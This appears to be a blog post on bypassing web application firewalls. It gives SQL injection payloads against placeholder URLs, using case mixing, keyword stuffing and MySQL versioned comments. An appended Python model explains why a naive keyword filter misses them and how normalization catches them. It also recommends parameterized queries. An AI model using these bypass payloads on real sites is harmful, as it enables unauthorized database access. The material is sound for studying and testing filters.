By: S-Connect
July 29, 2016

Part 2: Bypass a Web Application Firewall (WAF)

Function Capitalization Technique:
For those WAFs which filter only lowercase, we can easily bypass:
Query:
https://lxy.com/cost.php?id=90 UNION SELECT 1,2,3--
Bypass:
http://lxy.com/cost.php?id=-90 uniOn SeLeCt 1,2,3--

Replaced Keywords Technique:
For those WAFs which escape certain keywords such as UNION, SELECT, ORDER BY, and so on:
Query:
http://abcxyz.com/itemdetail.php?id=-57 UNION SELECT 1,2--
Bypass:
http://abcxyz.com/itemdetail.php?id=-57 UNIunionON SEselectLECT 1,2--

SQLi:
http://xyz.com/pricing.php?id=32 union all select 1,2,3---
Bypassed SQLi:
http://xyz.com/pricing.php?id=32 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3---
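To see why each of these three tricks works, and what a filter has to do to survive them, here is an added Python model that is not code from the post: a single-pass keyword stripper that treats every /* ... */ as an inert comment, beside a detector that folds case, unwraps MySQL /*! ... */ comments and re-scans after every removal. The sample query strings are the post's own, trimmed to the parameter; the function names and the filter model are assumptions for the demonstration.

```python
import re

# Constructed inputs: the query strings from the post (host/path dropped) plus a benign one.
SAMPLES = {
    "plain":   "id=-90 UNION SELECT 1,2,3--",
    "case":    "id=-90 uniOn SeLeCt 1,2,3--",
    "stuffed": "id=-57 UNIunionON SEselectLECT 1,2--",
    "comment": "id=32 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3---",
    "benign":  "id=32",
}
KEYWORDS = ("union", "select")
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)                # any /* ... */
VERSIONED_RE = re.compile(r"/\*!\d*\s*(.*?)\s*\*/", re.S)  # MySQL /*! ... */

def strip_once(text: str) -> str:
    # One pass per keyword; whatever is left behind is never re-scanned.
    for kw in KEYWORDS:
        text = re.sub(kw, "", text, flags=re.I)
    return text

def naive_sanitize(query: str) -> str:
    """Weak filter model: /* ... */ forwarded untouched as comments; other text stripped once."""
    out, pos = [], 0
    for m in COMMENT_RE.finditer(query):
        out.append(strip_once(query[pos:m.start()]))
        out.append(m.group(0))
        pos = m.end()
    out.append(strip_once(query[pos:]))
    return "".join(out)

def normalize(query: str) -> str:
    """MySQL's view: /*! ... */ bodies live, other comments gone, case folded, '+'/whitespace collapsed."""
    q = COMMENT_RE.sub(" ", VERSIONED_RE.sub(r" \1 ", query))
    return re.sub(r"\s+", " ", q.replace("+", " ").lower()).strip()

def reaches_db(forwarded: str) -> bool:
    """True if the forwarded request still carries UNION ... SELECT for MySQL."""
    return re.search(r"\bunion\b.*\bselect\b", normalize(forwarded)) is not None

def hardened_flags(query: str) -> bool:
    """Normalize first, then re-scan after every removal so stuffing collapses."""
    q, hits, changed = normalize(query), set(), True
    while changed:
        changed = False
        for kw in KEYWORDS:
            if kw in q:
                q, changed = q.replace(kw, ""), True
                hits.add(kw)
    return hits == set(KEYWORDS)
```

The stripping filter forwards the stuffed and commented requests with a live UNION SELECT in them, while the normalizing detector flags all four injected forms; the detector is a network-layer backstop only, and the cost.php/itemdetail.php/pricing.php queries themselves need parameterized statements to close the hole.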
Stay Linked!! Ali Tabish
